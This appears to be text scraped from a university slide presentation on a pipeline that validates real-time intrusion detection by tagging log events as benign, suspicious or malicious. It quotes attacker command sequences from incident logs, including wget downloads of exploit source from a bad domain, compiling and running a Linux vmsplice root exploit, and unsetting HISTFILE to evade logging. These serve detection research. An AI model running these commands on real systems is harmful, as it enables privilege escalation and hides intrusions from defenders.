Scalable Data Analytics Pipeline for Validation
- f Real-Time Attack Detection
Scalable Data Analytics Pipeline for Validation of Real-Time Attack - - PowerPoint PPT Presentation
Scalable Data Analytics Pipeline for Validation of Real-Time Attack Detection Eric Badger , Phuong Cao, Alex Withers, Adam Slagell, Zbigniew Kalbarczyk, Ravi Iyer University of Illinois Urbana-Champaign 1 Overview Introduction/Motivation
[1] Sharma, A.; Kalbarczyk, Z.; Barlow, J.; Iyer, R., "Analysis of security data from a large computing organization," in Dependable Systems & Networks (DSN), 2011 IEEE/IFIP 41st International Conference on
Bro IDS File Integrity Monitor Syslog
$ wget server6.bad-domain.com/vm.c Connecting to xx.yy.zz.tt:80… connected. HTTP 1.1 GET /vm.c 200 OK
$ gcc vm.c -o a; ./a Linux vmsplice Local Root Exploit [+] mmap: 0xAABBCCDD [+] page: 0xDDEEFFGG … # whoami root
$ uname -a; w Linux 2.6.xx, up 1:17, 1 user USER TTY LOGIN@ IDLE xxx console 18:40 1:16
sshd: Accepted <user> from <remote>
sshd: Received SIGHUP; restarting.
alice:password123 bob:password456 …
Password guessing Email phishing Social engineering
alice:password123 bob:password456 …
5
benign
RAW LOGS
$ wget bad- domain.com/vm.c $ gcc vm.c -o a; ./a $ uname -a; w sshd: Accepted <user> sshd: Received SIGHUP; restarting.
USER STATES
benign suspicious malicious
DOWNLOAD_SENSITIVE COMPILE OS_FINGERPRINT LOGIN_REMOTELY RESTART SYS SERVICE
EVENTS
suspicious malicious malicious suspicious
[2] P. Cao, K. Chung, Z.Kalbarczyk, R. Iyer, and A. Slagell. Preemptive intrusion
[3] P. Cao, E. Badger, Z. Kalbarczyk, R. Iyer, and Adam Slagell. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15.
[3] P. Cao, E. Badger, Z. Kalbarczyk, R. Iyer, and Adam Slagell. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15.
[3] P. Cao, E. Badger, Z. Kalbarczyk, R. Iyer, and Adam Slagell. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15.
11:00:57 sshd: Failed password for root 23:08:26 sshd: Failed password for root 23:08:30 sshd: Failed password for nobody 23:08:38 sshd: Failed password for <user> 23:08:42 sshd: Failed password for root The security team received ssh suspicious alerts from <machine> for the user <user>. There were also some Bro alerts from the machine <machine>. From the Bro sshd logs the user ran the following commands: ALERT_FAILED_PASSWORD ALERT_FAILED_PASSWORD ALERT_FAILED_PASSWORD ALERT_FAILED_PASSWORD ALERT_FAILED_PASSWORD READ_HOST_CONFIGURATION ALERT_DISABLE_LOGGING ALERT_DOWNLOAD_SENSITIVE ALERT_COMPILE_CODE uname -a unset HISTFILE wget <xx.yy.zz.tt>/abs.c -O a.c gcc a.c -o a;
[3] P. Cao, E. Badger, Z. Kalbarczyk, R. Iyer, and Adam Slagell. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15.
OSSEC Logs RKHunter Logs Auth Logs Snoopy Logs Bro Notice Logs
Log Storage Attack Detection Data Visualization AttackTagger Data Source Monitors Log Aggregation and Normalization Message Queue Bro Honeypots Network Traffic/Raw Logs Events
[1] Sharma, A.; Kalbarczyk, Z.; Barlow, J.; Iyer, R., "Analysis of security data from a large computing organization," in Dependable Systems & Networks (DSN), 2011 IEEE/IFIP 41st International Conference on [2] Phuong Cao, Key-whan Chung, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam J. Slagell. 2014. Preemptive intrusion detection. In Proceedings of the 2014 Symposium and Bootcamp on the Science of Security (HotSoS '14). ACM, New York, NY, USA, , Article 21 , 2 pages. DOI=10.1145/2600176.2600197 http://doi.acm.org/10.1145/2600176.2600197 [3] Phuong Cao, Eric Badger, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam Slagell. 2015. Preemptive intrusion detection: theoretical framework and real-world measurements. In Proceedings of the 2015 Symposium and Bootcamp on the Science of Security (HotSoS '15). ACM, New York, NY, USA, , Article 5 , 12 pages. DOI=10.1145/2746194.2746199 http://doi.acm.org/10.1145/2746194.2746199